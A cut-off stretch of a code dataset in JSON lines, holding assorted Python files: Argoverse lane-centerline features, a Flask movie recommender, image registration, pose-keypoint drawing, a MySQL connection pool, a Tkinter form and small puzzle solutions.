polygon of lanes.\n\n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n Returns:\n sorted_lane_seqs: Sequences of lane sequences sorted based on the point_in_polygon score\n\n \"\"\"\n point_in_polygon_scores = []\n for lane_seq in lane_seqs:\n point_in_polygon_scores.append(\n self.get_point_in_polygon_score(lane_seq, xy_seq, city_name,\n avm))\n randomized_tiebreaker = np.random.random(len(point_in_polygon_scores))\n sorted_point_in_polygon_scores_idx = np.lexsort(\n (randomized_tiebreaker, np.array(point_in_polygon_scores)))[::-1]\n sorted_lane_seqs = [\n lane_seqs[i] for i in sorted_point_in_polygon_scores_idx\n ]\n sorted_scores = [\n point_in_polygon_scores[i]\n for i in sorted_point_in_polygon_scores_idx\n ]\n return sorted_lane_seqs, sorted_scores\n\n def get_heuristic_centerlines_for_test_set(\n self,\n lane_seqs: List[List[int]],\n xy_seq: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n max_candidates: int,\n scores: List[int],\n ) -> List[np.ndarray]:\n \"\"\"Sort based on distance along centerline and return the centerlines.\n \n Args:\n lane_seqs: Sequence of lane sequences\n xy_seq: Trajectory coordinates\n city_name: City name (PITT/MIA)\n avm: Argoverse map_api instance\n max_candidates: Maximum 
number of centerlines to return\n Return:\n sorted_candidate_centerlines: Centerlines in the order of their score \n\n \"\"\"\n aligned_centerlines = []\n diverse_centerlines = []\n diverse_scores = []\n num_candidates = 0\n\n # Get first half as aligned centerlines\n aligned_cl_count = 0\n for i in range(len(lane_seqs)):\n lane_seq = lane_seqs[i]\n score = scores[i]\n diverse = True\n centerline = avm.get_cl_from_lane_seq([lane_seq], city_name)[0]\n if aligned_cl_count < int(max_candidates / 2):\n start_dist = LineString(centerline).project(Point(xy_seq[0]))\n end_dist = LineString(centerline).project(Point(xy_seq[-1]))\n if end_dist > start_dist:\n aligned_cl_count += 1\n aligned_centerlines.append(centerline)\n diverse = False\n if diverse:\n diverse_centerlines.append(centerline)\n diverse_scores.append(score)\n\n num_diverse_centerlines = min(len(diverse_centerlines),\n max_candidates - aligned_cl_count)\n test_centerlines = aligned_centerlines\n if num_diverse_centerlines > 0:\n probabilities = ([\n float(score + 1) / (sum(diverse_scores) + len(diverse_scores))\n for score in diverse_scores\n ] if sum(diverse_scores) > 0 else [1.0 / len(diverse_scores)] *\n len(diverse_scores))\n diverse_centerlines_idx = np.random.choice(\n range(len(probabilities)),\n num_diverse_centerlines,\n replace=False,\n p=probabilities,\n )\n diverse_centerlines = [\n diverse_centerlines[i] for i in diverse_centerlines_idx\n ]\n test_centerlines += diverse_centerlines\n\n return test_centerlines\n\n def get_candidate_centerlines_for_trajectory(\n self,\n xy: np.ndarray,\n city_name: str,\n avm: ArgoverseMap,\n viz: bool = False,\n max_search_radius: float = 50.0,\n seq_len: int = 50,\n max_candidates: int = 10,\n mode: str = \"test\",\n ) -> List[np.ndarray]:\n \"\"\"Get centerline candidates upto a threshold.\n\n Algorithm:\n 1. Take the lanes in the bubble of last observed coordinate\n 2. Extend before and after considering all possible candidates\n 3. 
Get centerlines based on point in polygon score.\n\n Args:\n xy: Trajectory coordinates, \n city_name: City name, \n avm: Argoverse map_api instance, \n viz: Visualize candidate centerlines, \n max_search_radius: Max search radius for finding nearby lanes in meters,\n seq_len: Sequence length, \n max_candidates: Maximum number of centerlines to return, \n mode: train/val/test mode\n\n Returns:\n candidate_centerlines: List of candidate centerlines\n\n \"\"\"\n # Get all lane candidates within a bubble\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n # Keep expanding the bubble until at least 1 lane is found\n while (len(curr_lane_candidates) < 1\n and self._MANHATTAN_THRESHOLD < max_search_radius):\n self._MANHATTAN_THRESHOLD *= 2\n curr_lane_candidates = avm.get_lane_ids_in_xy_bbox(\n xy[-1, 0], xy[-1, 1], city_name, self._MANHATTAN_THRESHOLD)\n\n assert len(curr_lane_candidates) > 0, \"No nearby lanes found!!\"\n\n # Set dfs threshold\n traj_len = xy.shape[0]\n\n # Assuming a speed of 50 mps, set threshold for traversing in the front and back\n dfs_threshold_front = (self._DFS_THRESHOLD_FRONT_SCALE *\n (seq_len + 1 - traj_len) / 10)\n dfs_threshold_back = self._DFS_THRESHOLD_BACK_SCALE * (traj_len +\n 1) / 10\n\n # DFS to get all successor and predecessor candidates\n obs_pred_lanes: List[Sequence[int]] = []\n for lane in curr_lane_candidates:\n candidates_future = avm.dfs(lane, city_name, 0,\n dfs_threshold_front)\n candidates_past = avm.dfs(lane, city_name, 0, dfs_threshold_back,\n True)\n\n # Merge past and future\n for past_lane_seq in candidates_past:\n for future_lane_seq in candidates_future:\n assert (\n past_lane_seq[-1] == future_lane_seq[0]\n ), \"Incorrect DFS for candidate lanes past and future\"\n obs_pred_lanes.append(past_lane_seq + future_lane_seq[1:])\n\n # Removing overlapping lanes\n obs_pred_lanes = remove_overlapping_lane_seq(obs_pred_lanes)\n\n # Sort lanes based on point in polygon score\n obs_pred_lanes, scores = self.sort_lanes_based_on_point_in_polygon_score(\n obs_pred_lanes, xy, city_name, avm)\n\n # If the best centerline is not along the direction of travel, re-sort\n if mode == \"test\":\n candidate_centerlines = self.get_heuristic_centerlines_for_test_set(\n obs_pred_lanes, xy, city_name, avm, max_candidates, scores)\n else:\n candidate_centerlines = avm.get_cl_from_lane_seq(\n [obs_pred_lanes[0]], city_name)\n\n if viz:\n plt.figure(0, figsize=(8, 7))\n for centerline_coords in candidate_centerlines:\n visualize_centerline(centerline_coords)\n plt.plot(\n xy[:, 0],\n xy[:, 1],\n \"-\",\n color=\"#d33e4c\",\n alpha=1,\n linewidth=3,\n zorder=15,\n )\n\n final_x = xy[-1, 0]\n final_y = xy[-1, 1]\n\n plt.plot(\n final_x,\n final_y,\n \"o\",\n color=\"#d33e4c\",\n alpha=1,\n markersize=10,\n zorder=15,\n )\n plt.xlabel(\"Map X\")\n plt.ylabel(\"Map Y\")\n plt.axis(\"off\")\n plt.title(f\"Number of candidates = {len(candidate_centerlines)}\")\n plt.show()\n\n return candidate_centerlines\n\n def compute_map_features(\n self,\n agent_track: np.ndarray,\n obs_len: int,\n seq_len: int,\n raw_data_format: Dict[str, int],\n mode: str,\n ) -> Tuple[np.ndarray, Dict[str, Any]]:\n \"\"\"Compute map based features for the given sequence.\n\n If the mode is test, oracle_nt_dist will be empty, candidate_nt_dist will be populated.\n If the mode is train/val, oracle_nt_dist will be populated, candidate_nt_dist will be empty.\n\n Args:\n agent_track : Data for the agent track\n obs_len : Length of 
observed trajectory\n seq_len : Length of the sequence\n raw_data_format : Format of the sequence\n mode: train/val/test mode\n \n Returns:\n oracle_nt_dist (numpy array): normal and tangential distances for oracle centerline\n map_feature_helpers (dict): Dictionary containing helpers for map features\n\n \"\"\"\n # Get observed 2 secs of the agent\n agent_xy = agent_track[:, [raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n agent_track_obs = agent_track[:obs_len]\n agent_xy_obs = agent_track_obs[:, [\n raw_data_format[\"X\"], raw_data_format[\"Y\"]\n ]].astype(\"float\")\n\n # Get API for Argo Dataset map\n avm = ArgoverseMap()\n\n city_name = agent_track[0, raw_data_format[\"CITY_NAME\"]]\n\n # Get candidate centerlines using observed trajectory\n if mode == \"test\":\n oracle_centerline = np.full((seq_len, 2), None)\n oracle_nt_dist = np.full((seq_len, 2), None)\n candidate_centerlines = self.get_candidate_centerlines_for_trajectory(\n agent_xy_obs,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n max_candidates=self._MAX_CENTERLINE_CANDIDATES_TEST,\n )\n\n # Get nt distance for the entire trajectory using candidate centerlines\n candidate_nt_distances = []\n for candidate_centerline in candidate_centerlines:\n candidate_nt_distance = np.full((seq_len, 2), None)\n candidate_nt_distance[:obs_len] = get_nt_distance(\n agent_xy_obs, candidate_centerline)\n candidate_nt_distances.append(candidate_nt_distance)\n\n else:\n oracle_centerline = self.get_candidate_centerlines_for_trajectory(\n agent_xy,\n city_name,\n avm,\n viz=False,\n max_search_radius=self._MAX_SEARCH_RADIUS_CENTERLINES,\n seq_len=seq_len,\n mode=mode,\n )[0]\n candidate_centerlines = [np.full((seq_len, 2), None)]\n candidate_nt_distances = [np.full((seq_len, 2), None)]\n\n # Get NT distance for oracle centerline\n oracle_nt_dist = get_nt_distance(agent_xy,\n oracle_centerline,\n viz=False)\n\n map_feature_helpers = {\n \"ORACLE_CENTERLINE\": oracle_centerline,\n \"CANDIDATE_CENTERLINES\": candidate_centerlines,\n \"CANDIDATE_NT_DISTANCES\": candidate_nt_distances,\n }\n\n return oracle_nt_dist, map_feature_helpers\n","repo_name":"jagjeet-singh/argoverse-forecasting","sub_path":"utils/map_features_utils.py","file_name":"map_features_utils.py","file_ext":"py","file_size_in_byte":14206,"program_lang":"python","lang":"en","doc_type":"code","stars":228,"dataset":"github-code","pt":"36"}
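The point-in-polygon scoring used by get_point_in_polygon_score above reduces to a small shapely idiom: union the lane polygons, then count the trajectory points the union contains. A self-contained toy version (made-up rectangles; note that shapely >= 2.0 spells cascaded_union as unary_union):

from shapely.geometry import Point, Polygon
from shapely.ops import unary_union

lane_polygons = [
    Polygon([(0, 0), (4, 0), (4, 2), (0, 2)]),
    Polygon([(4, 0), (8, 0), (8, 2), (4, 2)]),
]
lane_seq_polygon = unary_union([p.buffer(0) for p in lane_polygons])

trajectory = [(1, 1), (5, 1), (9, 1)]  # last point lies outside both lanes
score = sum(lane_seq_polygon.contains(Point(xy)) for xy in trajectory)
print(score)  # 2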
+{"seq_id":"6822986820","text":"from flask import Flask, jsonify, request\nimport pandas as pd\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nimport os\n\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\ndf = pd.read_csv(\"all_movies.csv\")\n\nid = []\ntitle = []\ncorpus = []\ndetails_by_id = {}\n\nfor index, row in df.iterrows():\n id.append(str(row['id']))\n title.append(row['title'])\n corpus.append(row['corpus'])\n details_by_id[str(row['id'])] = {\n \"title\": row['title'], \"corpus\": row['corpus'], \"backdrop\": row['backdrop'], \"poster\": row['poster']}\n\nvectorizer = TfidfVectorizer()\ntfidf_matrix = vectorizer.fit_transform(corpus)\n\ngenres = {}\n\nfor root, dirs, files in os.walk(\"./genres\"):\n for file_name in files:\n genre = file_name[:-4]\n file_path = os.path.join(root, file_name)\n df = pd.read_csv(file_path)\n df = df.drop('corpus', axis=1)\n df = df.fillna('')\n data = df.to_dict('records')\n genres[genre] = data\n\n\ndef find_similar_corpus(query, tfidf_matrix):\n query_vector = vectorizer.transform([query])\n similarity_scores = cosine_similarity(query_vector, tfidf_matrix).flatten()\n sorted_indices = np.argsort(similarity_scores)[::-1]\n return sorted_indices, similarity_scores\n\n\ndef find_similar_movies(_ids, k):\n l = 4\n movies = []\n added_movie_ids = set(_ids)\n count = 0\n for _id in _ids:\n if count > 15:\n break\n _corpus = details_by_id[_id][\"corpus\"]\n indices, sim_scores = find_similar_corpus(_corpus, tfidf_matrix)\n for i in range(1, l):\n index = indices[i]\n movie_id = id[index]\n if movie_id and title[index] and movie_id not in added_movie_ids:\n count += 1\n added_movie_ids.add(movie_id)\n poster = details_by_id[movie_id][\"poster\"]\n backdrop = details_by_id[movie_id][\"backdrop\"]\n if not backdrop:\n backdrop = \"\"\n if not poster:\n poster = \"\"\n movies.append({\n \"id\": movie_id,\n \"title\": title[index],\n \"backdrop\": backdrop,\n \"poster\": poster\n })\n else:\n l += 1\n return movies\n\n\nall_movies = []\ndf2 = pd.read_csv(\"all_movies.csv\")\ndf2 = df2.drop('corpus', axis=1)\ndf2 = df2.fillna('')\ndata = df2.to_dict('records')\nall_movies = data\n\n\n@app.route(\"/\")\ndef index():\n return \"Welcome to movie recommender\"\n\n\n@app.route(\"/get_recommendations//\")\ndef similar_movies(ids, k):\n ids = ids.split(\"|\")\n sim_movies = find_similar_movies(ids, k)\n return jsonify(sim_movies)\n\n\n@app.route(\"/get_genre_movies/\")\ndef genre_movies(genre):\n return jsonify(genres[genre])\n\n\n@app.route(\"/get_all_movies\")\ndef get_all_movies():\n return jsonify(all_movies)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n\n# flask --app app.py --debug run\n","repo_name":"walker-617/Recommender-Engine","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"39579146339","text":"file = './2/input.txt'\nwith open(file) as fn:\n raw = fn.read()\n\nt = {\n \"A\": \"r\",\n \"X\": \"r\",\n \"B\": \"p\",\n \"Y\": \"p\",\n \"C\": \"s\",\n \"Z\": \"s\",\n}\n\np = {\n \"r\": 1,\n \"p\": 2,\n \"s\": 3,\n}\n\nw = {\n \"r\": \"p\",\n \"p\": \"s\",\n \"s\": \"r\",\n}\n\nl = {v: k for k, v in w.items()}\n\ndef score(a):\n r = p[a[1]]\n if a[0] == a[1]:\n return r + 3\n if w[a[0]] == a[1]:\n return r + 6\n return r\n\ndef transform(a):\n a[0] = t[a[0]]\n if a[1] == 'Y':\n a[1] = a[0]\n if a[1] == 'Z':\n a[1] = w[a[0]]\n if a[1] == 'X':\n a[1] = l[a[0]]\n return a\n\nparsed = [ score([ t[i] for i in ln.split(\" \") ]) for ln in raw.splitlines() ]\nprint(sum(parsed))\nparsed = [ score(transform(ln.split(\" \"))) for ln in raw.splitlines() ]\nprint(sum(parsed))","repo_name":"PhilippLange/aoc_2022","sub_path":"02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"29450839101","text":"import cv2\nimport numpy as np\n\n\ndef image_registration(img_1_clr, img_2_clr, n=15000):\n img_1 = cv2.cvtColor(img_1_clr, cv2.COLOR_BGR2GRAY)\n img_2 = cv2.cvtColor(img_2_clr, cv2.COLOR_BGR2GRAY)\n height, width = img_2.shape\n\n # ORB detector\n orb_detector = cv2.ORB_create(n)\n\n kp1, d1 = orb_detector.detectAndCompute(img_1, None)\n kp2, d2 = orb_detector.detectAndCompute(img_2, None)\n\n matcher = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)\n matches = matcher.match(d1, d2)\n matches.sort(key=lambda x: x.distance)\n\n matches = matches[: int(len(matches) * 0.7)]\n no_of_matches = len(matches)\n\n p1 = np.zeros((no_of_matches, 2))\n p2 = np.zeros((no_of_matches, 2))\n\n for i in range(len(matches)):\n p1[i, :] = kp1[matches[i].queryIdx].pt\n p2[i, :] = kp2[matches[i].trainIdx].pt\n\n homography, mask = cv2.findHomography(p1, p2, cv2.RANSAC)\n\n crop_1 = cv2.warpPerspective(img_1_clr, homography, (width, height))\n crop_2 = img_2_clr\n\n return crop_1, crop_2\n","repo_name":"alexandraroots/post_stamps","sub_path":"image_registration.py","file_name":"image_registration.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"5926829549","text":"import os\nimport os.path as osp\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\nimport random\nimport cv2\nimport argparse\nimport math\n\nimport tensorflow as tf\n\n# for tensorflow_cpn\nfrom config import cfg\nfrom dataset import Preprocessing\n\n# for keras_retinanet\nfrom keras_retinanet.utils.image import preprocess_image, resize_image\n\ndef draw_bounding_box(frame, person_dets):\n\n\tx, y, w, h = person_dets\n\n\ttop = max(0, np.floor(x + 0.5).astype(int))\n\tleft = max(0, np.floor(y + 0.5).astype(int))\n\tright = min(frame.shape[1], np.floor(x + w + 0.5).astype(int))\n\tbottom = min(frame.shape[0], np.floor(y + h + 0.5).astype(int))\n\n\tcv2.rectangle(frame, (top, left), (right, bottom), (255, 0, 0), 2)\n\n\ndef read_pb_return_tensors(graph, pb_file, return_elements):\n\n\twith tf.gfile.FastGFile(pb_file, 'rb') as f:\n\t\tfrozen_graph_def = tf.GraphDef()\n\t\tfrozen_graph_def.ParseFromString(f.read())\n\n\twith graph.as_default():\n\t\treturn_elements = tf.import_graph_def(frozen_graph_def,\n\t\t\t\t\t\treturn_elements=return_elements)\n\treturn return_elements\n\n\ndef crop(pose_img, person_dets):\n\n\t# cls_dets : x1, y1, x2, y2, score\n\tcls_dets = np.zeros((1, 4), dtype=np.float32)\n\t# test_data : x, y, w, h, score\n\ttest_data = np.zeros((1, 4), dtype=np.float32)\n\n\ttest_data[:] = person_dets[:]\n\n\tbbox = np.asarray(test_data[0])\n\tcls_dets[0, :4] = np.array([bbox[0], bbox[1], bbox[0] + bbox[2], bbox[1] + bbox[3]])\n\n\ttest_imgs = []\n\tdetails = []\n\n\t# cropping\n\ttest_img, detail = Preprocessing(pose_img, test_data[0], stage='test')\n\n\tdetails.append(detail)\n\n\tdetails = np.asarray(details).astype(np.float32)\n\n\tfeed = test_img\n\n\tdata = [feed.transpose(0, 2, 3, 1).astype(np.float32)]\n\n\treturn data, details\n\ndef keypoint_detection(res, details):\n\n\tflat = [0.0 for i in range(cfg.nr_skeleton * 2)]\n\tcls_skeleton = np.zeros((1, cfg.nr_skeleton, 3)).astype(np.float32)\n\tcrops = np.zeros((1, 4)).astype(np.float32)\n\n\tres = res.transpose(0, 3, 1, 2)\n\n\t# single map\n\tr0 = res[0].copy()\n\tr0 /= 255.\n\tr0 += 0.5\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tres[0, w] /= np.amax(res[0, w])\n\tborder = 10\n\tdr = np.zeros((cfg.nr_skeleton, cfg.output_shape[0] + 2 * border, cfg.output_shape[1] + 2 * border))\n\tdr[:, border:-border, border:-border] = res[:cfg.nr_skeleton].copy()\n\n\tfor w in range(cfg.nr_skeleton):\n\t\tdr[w] = cv2.GaussianBlur(dr[w], (21, 21), 0)\n\tfor w in range(cfg.nr_skeleton):\n\t\tlb = dr[w].argmax()\n\t\ty, x = np.unravel_index(lb, dr[w].shape)\n\t\tdr[w, y, x] = 0\n\t\tlb = dr[w].argmax()\n\t\tpy, px = np.unravel_index(lb, dr[w].shape)\n\t\ty -= border\n\t\tx -= border\n\t\tpy -= border + y\n\t\tpx -= border + x\n\t\tln = (px ** 2 + py ** 2) ** 0.5\n\t\tdelta = 0.25\n\t\tif ln > 1e-3:\n\t\t\tx += delta * px / ln\n\t\t\ty += delta * py / ln\n\t\tx = max(0, min(x, cfg.output_shape[1] - 1))\n\t\ty = max(0, min(y, cfg.output_shape[0] - 1))\n\t\tcls_skeleton[0, w, :2] = (x * 4 + 2, y * 4 + 2)\n\t\tcls_skeleton[0, w, 2] = r0[w, int(round(y) + 1e-10), int(round(x) + 1e-10)]\n\n\t# map back to original images\n\tcrops[0, :] = details[0, :]\n\tfor w in range(cfg.nr_skeleton):\n\t\tcls_skeleton[0, w, 0] = cls_skeleton[0, w, 0] / cfg.data_shape[1] * (\n\t\t\t\t\tcrops[0][2] - crops[0][0]) + crops[0][0]\n\t\tcls_skeleton[0, w, 1] = cls_skeleton[0, w, 1] / cfg.data_shape[0] * (\n\t\t\t\t\tcrops[0][3] - crops[0][1]) + crops[0][1]\n\n\t# flat is keypoints(17)\n\tfor w in 
range(cfg.nr_skeleton):\n\t\tflat[w*2] = cls_skeleton[0, w, 0]\n\t\tflat[w*2+1] = cls_skeleton[0, w, 1]\n\n\treturn flat\n\ndef upper_detection(frame, flat, person_dets):\n\n\t# upper detection & lower keypoint remove\n\tupper = False\n\n\t\"\"\"\n\tlower keypoint remove using keypoint of hip, knee\n\n\tl_hip_y , r_hip_y : flat[23], flat[25] or cls_skeleton[0, 11, 1], cls_skeleton[0, 12, 1]\n\tl_knee_y, r_knee_y : flat[27], flat[29] or cls_skeleton[0, 13, 1], cls_skeleton[0, 14, 1]\n\n\t\"\"\"\n\n\tl_hip_y = flat[23]\n\tr_hip_y = flat[25]\n\t\n\tl_knee_y = flat[27]\n\tr_knee_y = flat[29]\n\n\tbbox_y = person_dets[1] + person_dets[3]\n\n\n\t# remove based on hip keypoint\n\thip_distance_r = r_hip_y - bbox_y\n\thip_distance_l = l_hip_y - bbox_y\n\n\t# remove based on knee keypoint \n\tknee_distance_r = r_knee_y - bbox_y\n\tknee_distance_l = l_knee_y - bbox_y\n\n\t# remove based on bounding box (frame.shape[0] = 720)\n\tbox_distance = bbox_y - frame.shape[0]\n\n\t\n\thip_distance_r = abs(hip_distance_r)\n\thip_distance_l = abs(hip_distance_l)\n\tknee_distance_r = abs(knee_distance_r)\n\tknee_distance_l = abs(knee_distance_l)\n\tbox_distance = abs(box_distance)\n\n\n\tif ((hip_distance_r < 110 and hip_distance_l < 110 and box_distance < 30) or (knee_distance_r < 50 and knee_distance_l < 50 and box_distance < 30)):\n\t\tupper = True\n\t\t\n\t\t# remove lower (knee, ankle) keypoint\n\t\tfor i in range(26, 34):\n\t\t\tflat[i] = 0.0\n\n\treturn flat, upper\n\n\ndef draw_skeleton(aa, kp, upper=False):\n\n\t#upper = False\n\n\tshow_skeleton_labels = False\n\n\tkp = np.array(kp).astype(int)\n\tkp = kp.reshape(17, 2)\n\n\tkp_names = ['nose', 'l_eye', 'r_eye', 'l_ear', 'r_ear', 'l_shoulder', \n\t\t\t'r_shoulder', 'l_elbow', 'r_elbow', 'l_wrist', 'r_wrist', \n\t\t\t'l_hip', 'r_hip', 'l_knee', 'r_knee', 'l_ankle', 'r_ankle']\n\n\tskeleton = [[16, 14], [14, 12], [17, 15], [15, 13], [12, 13], [6, 12], [7, 13], [6, 7], [6, 8], [7, 9], [8, 10], [9, 11], [2, 3], [1, 2], [1, 3], [2, 4], [3, 5], [4, 6], [5, 7]]\n\n\t# remove lower (knee, ankle) \n\tif upper :\n\t\tskeleton = skeleton[4:]\t\n\t\tkp_names = kp_names[:13]\n\t\tkp = kp[:13]\n\n\tfor i, j in skeleton:\n\t\tif kp[i-1][0] >= 0 and kp[i-1][1] >= 0 and kp[j-1][0] >= 0 and kp[j-1][1] >= 0 and \\\n\t\t\t(len(kp[i-1]) <= 2 or (len(kp[i-1]) > 2 and kp[i-1][2] > 0.1 and kp[j-1][2] > 0.1)):\n\t\t\tcv2.line(aa, tuple(kp[i-1][:2]), tuple(kp[j-1][:2]), (0,255,255), 2)\n\tfor j in range(len(kp)):\n\t\tif kp[j][0] >= 0 and kp[j][1] >= 0:\n\n\t\t\tif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 1.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((0,0,255)), 2)\n\t\t\telif len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1):\n\t\t\t\tcv2.circle(aa, tuple(kp[j][:2]), 2, tuple((255,0,0)), 2)\n\n\t\t\tif show_skeleton_labels and (len(kp[j]) <= 2 or (len(kp[j]) > 2 and kp[j][2] > 0.1)):\n\t\t\t\tcv2.putText(aa, kp_names[j], tuple(kp[j][:2]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 0))\n\n\n\n","repo_name":"eehoeskrap/tensorrt_cpn","sub_path":"Processing.py","file_name":"Processing.py","file_ext":"py","file_size_in_byte":6050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"15769509798","text":"import random\nimport numpy as np\nimport sys\n\nf = open('perturbations.txt', 'w')\nwith open(\"pfm_all.txt\") as handle:\n for m in motifs.parse(handle, \"jaspar\"):\n counts = m.counts\n values = list()\n ncol = len(counts[1,:])\n for x in range(0,ncol): \n for y in range(0,4):\n values.append(counts[y,x])\n new_counts = np.reshape(np.matrix(values), (4,ncol), order=\"F\")\n for x in range(0,ncol):\n for y in range(0,20):\n a = random.randint(0,3)\n b = random.randint(0,3)\n old_a = new_counts[a,x]\n old_b = new_counts[b,x]\n new_counts[a,x] = old_b\n new_counts[b,x] = old_a\n f.write(\">%s %s\\n\"%(m.matrix_id,m.name))\n for x in range(0,4):\n for y in range(0, ncol):\n f.write(str(int(new_counts[x,y])))\n f.write(\"\\t\")\n f.write(\"\\n\")\n\nf.close() \n","repo_name":"ReddyLab/TransversionsInRegElements","sub_path":"Perturb_motif_rows.py","file_name":"Perturb_motif_rows.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"26860199731","text":"from DBUtils.PooledDB import PooledDB\nimport pymysql\nPOOL = PooledDB(\n creator=pymysql, # 使用链接数据库的模块\n maxconnections=6, # 连接池允许的最大连接数,0或None表示不限制\n mincached=2, # 初始时链接池中至少创建的空闲链接,0表示不创建\n maxcached=5, # 链接池中最多闲置的链接,0或None表示不限制\n maxshared=3, # 链接池中最多共享的链接数据\n blocking=True, # 连接池中如果没有可用连接后是否阻塞等待。True 等待、False不等待报错\n maxusage=None, # 一个链接最多被重复使用的次数,None表示不限制\n setsession=[], # 会话前执行的命令列表\n ping=0, # 检查服务是否可用\n # pymysql 连接配置\n host=\"127.0.0.1\",\n user=\"lance\",\n password=\"LANCEyuan88\",\n database=\"codepy\",\n charset=\"utf8\"\n)\n\n\nclass DataBase(object):\n def conn(self):\n conn = POOL.connection()\n # cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)\n cursor = conn.cursor()\n # cursor.execute(\"select * from app01_book\")\n return conn, cursor\n def get_one(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchone()\n cursor.close()\n conn.close()\n return data\n def get_all(self, sql, args):\n conn, cursor = self.conn()\n cursor.execute(sql, args)\n data = cursor.fetchall()\n cursor.close()\n conn.close()\n return data\n\n","repo_name":"LanceYuan/codepyFlask","sub_path":"DBpool.py","file_name":"DBpool.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28956565151","text":"from tkinter import ttk\nfrom tkinter import *\n\n# (\"I Curso\")\n# (\"II Semestre\")\n# (\"III Su Nobre Completo\")\n# (\"IV Su Número De Carné\")\nclass Desk:\n def __init__(self, window):\n \n anchura = 1000 \n altura = 800\n \n self.wind = window\n\n self.wind.geometry(str(anchura)+'x'+str(altura))\n \n self.wind.columnconfigure(0, weight=1)\n \n self.wind.title('Examen Final')\n\n frame = LabelFrame(self.wind, text = 'Calificacion')\n frame.grid(row = 0, column = 0, columnspan = 3, pady = 20)\n \n Label(frame, text = 'Ingrese el primer numero: ').grid(row = 1, column = 0)\n \n self.var1 = Entry(frame)\n self.var1.focus()\n self.var1.grid(row = 1, column = 1)\n \n Label(frame, text = 'Ingrese el segundo numero: ').grid(row = 2, column = 0)\n self.var2 = Entry(frame)\n self.var2.grid(row = 2, column = 1)\n \n\n Label(frame, text = 'Ingrse el segundo numero: ').grid(row = 3, column = 0)\n self.var3 = Entry(frame)\n self.var3.grid(row = 3, column = 1)\n \n \n Button (frame, text = 'Iniciar', command = self.bottonR).grid(row = 6, columnspan = 5, sticky = W + E)\n Button (frame, text = 'Mostrar', command = self.bottonD).grid(row = 7, columnspan = 5, sticky = W + E)\n \n self.message = Label(text = '', fg = 'red')\n self.message.grid(row = 3, column = 0, columnspan = 2, sticky = W + E)\n\n \n def bottonR(self):\n a=float(self.var1.get())\n b=float(self.var2.get())\n c=float(self.var3.get())\n if (a 1\n# B -> 2\n# C -> 3\n# ...\n# Z -> 26\n# AA -> 27\n# AB -> 28\n# ...\n#\n#\n# 示例 1:\n#\n# 输入: \"A\"\n# 输出: 1\n#\n#\n# 示例 2:\n#\n# 输入: \"AB\"\n# 输出: 28\n#\n#\n# 示例 3:\n#\n# 输入: \"ZY\"\n# 输出: 701\n#\n# 致谢:\n# 特别感谢 @ts 添加此问题并创建所有测试用例。\n#\n#\n\n\nclass Solution:\n def titleToNumber(self, s: str) -> int:\n res = 0\n for i in s:\n res = 26 * res + ord(i) - 64\n return res\n","repo_name":"ZodiacSyndicate/leet-code-solutions","sub_path":"easy/171.excel表列序号/171.excel表列序号.py","file_name":"171.excel表列序号.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"36"}
+{"seq_id":"1161949159","text":"'''The program extracts values of student number and grade from\na .txt file (grades_program.txt) and creates a dictionary using these values'''\n\nimport tkinter.filedialog\n\ndef main():\n \n grade_file = open(tkinter.filedialog.askopenfilename())\n print (read_grades(grade_file))\n grade_file.close()\n \n \n\ndef read_grades(gradefile):\n\n \n ## skip over the header.\n line = gradefile.readline()\n while line != '\\n':\n line = gradefile.readline()\n \n\n ## Read the grades, accumulating them into a dict.\n grade_to_ids = {}\n line = gradefile.readline()\n\n while line != '':\n student_id = line[:4]\n grade = float(line[4:].strip())\n\n if grade not in grade_to_ids:\n grade_to_ids[grade] = [student_id]\n else:\n grade_to_ids[grade].append(student_id)\n \n line = gradefile.readline()\n\n return grade_to_ids\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewbells/python_learning","sub_path":"coursera/populate_dict.py","file_name":"populate_dict.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
